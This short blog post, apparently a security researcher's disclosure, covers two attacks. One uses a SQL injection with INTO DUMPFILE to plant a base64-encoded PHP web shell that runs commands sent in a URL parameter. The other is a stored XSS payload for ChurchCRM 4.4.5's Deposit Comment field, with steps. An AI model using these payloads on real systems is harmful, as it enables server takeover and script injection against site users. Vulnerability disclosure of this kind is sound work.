GrimTheRipper

We use sqlmap to verify which revealed that the parameter has a sql injection vulnerability.

we can use sql injection to create a file by use into dumpfile and make a simple backdoor with base64.

system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7y=1') UNION ALL SELECT NULL,...,NULL,”<?php eval(base64_decode(‘c3lzdGVtKCRfR0VUWyJjbWQiXSk7’)); ?>”,...,NULL into dumpfile 283shell.php -- -

--

--

--

--

Vulnerability Explanation:

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

Affected Component:

http://ip_address:port/churchcrm/FindDepositSlip.php

Payload :

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

Tested on:

  1. ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
  2. Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

Steps to attack:

  1. Login with admin credential.

2. Go to the “Deposit” as show in the picture and Click on the “View All Deposits” then click on the “Deposit Comment” enter the XSS payload and press the “Add New Deposit” button.

--

--

GrimTheRipper

GrimTheRipper

You get the best out of others when you give the best of yourself